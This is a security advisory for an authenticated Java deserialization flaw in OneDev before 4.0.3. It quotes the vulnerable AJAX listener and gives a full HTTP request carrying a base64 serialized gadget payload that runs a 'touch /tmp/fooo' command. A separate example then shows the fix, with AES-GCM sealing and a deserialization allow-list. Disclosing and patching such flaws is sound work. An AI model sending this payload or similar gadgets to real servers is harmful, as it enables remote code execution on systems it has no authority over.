Impact

The application's BasePage registers an AJAX event listener (an AbstractPostAjaxBehavior) on every page other than the login page. The listener's respond() method reads the data parameter from the POST body, base64-decodes it and hands the raw bytes straight to SerializationUtils.deserialize(), so an authenticated user fully controls the bytes that reach Java deserialization:

```java
// Vulnerable listener (OneDev before 4.0.3): the client-supplied "data" parameter is
// base64-decoded and deserialized with no integrity check and no class filtering.
@Override
protected void respond(AjaxRequestTarget target) {
    IRequestParameters params = RequestCycle.get().getRequest().getPostParameters();
    String encodedData = params.getParameterValue("data").toString();
    byte[] bytes = Base64.decodeBase64(encodedData.getBytes());
    // Untrusted bytes are deserialized here, before onPopState ever sees the result.
    Serializable data = (Serializable) SerializationUtils.deserialize(bytes);
    onPopState(target, data);
    target.appendJavaScript("onedev.server.viewState.getFromHistoryAndSetToView();");
}
```

We can access this listener by submitting a POST request to any page, e.g.

```http
POST /projects/my-app/blob?7-1.IBehaviorListener.0- HTTP/1.1
Host: localhost:6610
Content-Length: 389
Accept: application/xml, text/xml, */*; q=0.01
X-Requested-With: XMLHttpRequest
Wicket-Ajax-BaseURL: projects/my-app/blob
Wicket-Ajax: true
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:6610
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:6610/projects/my-app/blob
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: JSESSIONID=node0cq7tdfxnza2v1nb58f7zwg7jj6.node0
Connection: close

data=rO0ABXN9AAAAAQAaamF2YS5ybWkucmVnaXN0cnkuUmVnaXN0cnl4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcgAtamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdEludm9jYXRpb25IYW5kbGVyAAAAAAAAAAICAAB4cgAcamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdNNhtJEMYTMeAwAAeHB3OAAKVW5pY2FzdFJlZgAPdG91Y2ggL3RtcC9mb29vAACFE//////C/CKmAAAAAAAAAAAAAAAAAAAAeA==
```

This endpoint is subject to authentication and, therefore, requires a valid user to carry out the attack.

This issue may lead to post-auth RCE.

Patches

This issue was addressed in 4.0.3 by encrypting the serialization payload with secrets known only to the server.
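The patch note above describes the fix in one sentence. The following is an added example, written for this page and not OneDev's own code, of what "encrypting the serialization payload with a secret known only to the server" looks like in Java. The class name SealedViewState, the AES-GCM construction and the ObjectInputFilter allow-list are this example's own assumptions; OneDev's actual implementation may differ. The point it demonstrates: because the browser never holds the key, it cannot produce a ciphertext that authenticates, so readObject() is never reached for attacker-built bytes such as the data value in the request above. The filter is defense in depth for the case where a sealed state is replayed or the key leaks.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.security.GeneralSecurityException;
import java.security.SecureRandom;
import java.util.Base64;
import java.util.HashMap;
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import javax.crypto.spec.GCMParameterSpec;

/**
 * Hypothetical hardened handling of the "data" parameter (added example, not OneDev's code).
 * The server only accepts view state it sealed itself: the serialized object is encrypted and
 * authenticated with AES-GCM under a key the client never sees, and the decrypted bytes are
 * additionally deserialized through an ObjectInputFilter allow-list.
 */
public class SealedViewState {
    private static final int GCM_TAG_BITS = 128;
    private static final int NONCE_BYTES = 12;
    private static final SecureRandom RNG = new SecureRandom();

    private final SecretKey key;            // server-side secret; in a real deployment, persisted per installation
    private final ObjectInputFilter filter; // defense in depth: only expected state classes may be deserialized

    public SealedViewState(SecretKey key, ObjectInputFilter filter) {
        this.key = key;
        this.filter = filter;
    }

    /** Serialize, encrypt with a fresh nonce, and base64-encode. This is what the server hands to the browser. */
    public String seal(Serializable state) throws IOException, GeneralSecurityException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(state);
        }
        byte[] nonce = new byte[NONCE_BYTES];
        RNG.nextBytes(nonce);
        Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
        cipher.init(Cipher.ENCRYPT_MODE, key, new GCMParameterSpec(GCM_TAG_BITS, nonce));
        byte[] ciphertext = cipher.doFinal(bos.toByteArray());
        byte[] out = new byte[nonce.length + ciphertext.length];
        System.arraycopy(nonce, 0, out, 0, nonce.length);
        System.arraycopy(ciphertext, 0, out, nonce.length, ciphertext.length);
        return Base64.getEncoder().encodeToString(out);
    }

    /** Decode, authenticate and decrypt, then deserialize through the filter. Forged input fails before readObject(). */
    public Serializable open(String encoded) throws IOException, GeneralSecurityException, ClassNotFoundException {
        byte[] in = Base64.getDecoder().decode(encoded);
        if (in.length < NONCE_BYTES + GCM_TAG_BITS / 8) {
            throw new GeneralSecurityException("payload too short to carry a nonce and tag");
        }
        Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
        cipher.init(Cipher.DECRYPT_MODE, key, new GCMParameterSpec(GCM_TAG_BITS, in, 0, NONCE_BYTES));
        // Throws javax.crypto.AEADBadTagException if the bytes were not produced under our key.
        byte[] plaintext = cipher.doFinal(in, NONCE_BYTES, in.length - NONCE_BYTES);
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(plaintext))) {
            ois.setObjectInputFilter(filter);
            return (Serializable) ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        KeyGenerator kg = KeyGenerator.getInstance("AES");
        kg.init(256);
        SecretKey key = kg.generateKey();
        // Allow-list (assumed state shape): java.lang classes and HashMap; everything else is rejected.
        ObjectInputFilter filter = ObjectInputFilter.Config.createFilter("java.lang.*;java.util.HashMap;!*");
        SealedViewState svs = new SealedViewState(key, filter);

        // Constructed sample state that the server would seal into the page.
        HashMap<String, Integer> state = new HashMap<>();
        state.put("scroll", 42);
        String token = svs.seal(state);
        System.out.println("round trip: " + svs.open(token));

        // Attacker-built payload: a plain (unsealed) serialized object, as in the original request. Rejected
        // by the GCM tag check, so the deserializer never runs on it.
        HashMap<String, String> forged = new HashMap<>();
        forged.put("cmd", "touch /tmp/fooo");
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(forged);
        }
        try {
            svs.open(Base64.getEncoder().encodeToString(bos.toByteArray()));
            System.out.println("forgery accepted (should not happen)");
        } catch (GeneralSecurityException e) {
            System.out.println("forgery rejected: " + e.getClass().getSimpleName());
        }
    }
}
```

Two practical notes on this design. The key must be generated once per installation and persisted (or derived from an existing server secret), otherwise state sealed before a restart will no longer open. And the allow-list in the filter has to cover serializable superclasses as well as the concrete types (here java.lang.* covers Number for Integer), since ObjectInputStream checks every class descriptor it reads, not only the top-level object.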
Credits
This issue was discovered by @pwntester